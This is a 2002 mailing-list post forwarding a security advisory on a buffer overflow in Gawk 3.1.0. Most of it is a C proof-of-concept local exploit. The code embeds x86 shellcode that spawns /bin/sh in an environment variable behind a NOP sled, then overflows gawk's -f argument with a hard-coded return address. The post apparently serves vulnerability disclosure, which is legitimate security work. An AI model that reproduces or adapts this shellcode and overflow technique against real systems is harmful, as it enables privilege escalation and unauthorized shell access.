[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Gawk Contains an Exploitable Buffer Overflow
From: |
KC |
Subject: |
Gawk Contains an Exploitable Buffer Overflow |
Date: |
Sat, 20 Apr 2002 14:32:13 -0500 |
Gawk Contains an Exploitable Buffer Overflow
http://www.securiteam.com/exploits/5SP0B206WG.html
Vulnerable systems:
Gawk version 3.1.0
Risk:
Low. Gawk is not setuid by default, however several programs use it,
opening a possibility of privilege escalation.
Exploit:
/* local GNU Awk 3.1.0-x proof of concept exploit */
#include <stdio.h>
#include <sys/signal.h>
void aborted(int);
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int
main()
{
unsigned long ret = 0xbffffd30;
char buf[8214];
char egg[1024];
char *ptr;
int i=0;
memset(buf,0x90,sizeof(buf));
ptr = egg;
for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = '\x90';
for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
egg[1024 - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
buf[8209] = (ret & 0x000000ff);
buf[8210] = (ret & 0x0000ff00) >> 8;
buf[8211] = (ret & 0x00ff0000) >> 16;
buf[8212] = (ret & 0xff000000) >> 24;
buf[8213] = 0x00;
printf("local GNU Awk 3.1.0-x proof of concept exploit\n");
printf("ret: 0x%x\n",ret);
printf("buf: %d\n\n",strlen(buf));
execl("/usr/bin/gawk", "gawk", "-f" , buf, NULL);
}
- Gawk Contains an Exploitable Buffer Overflow,
KC <=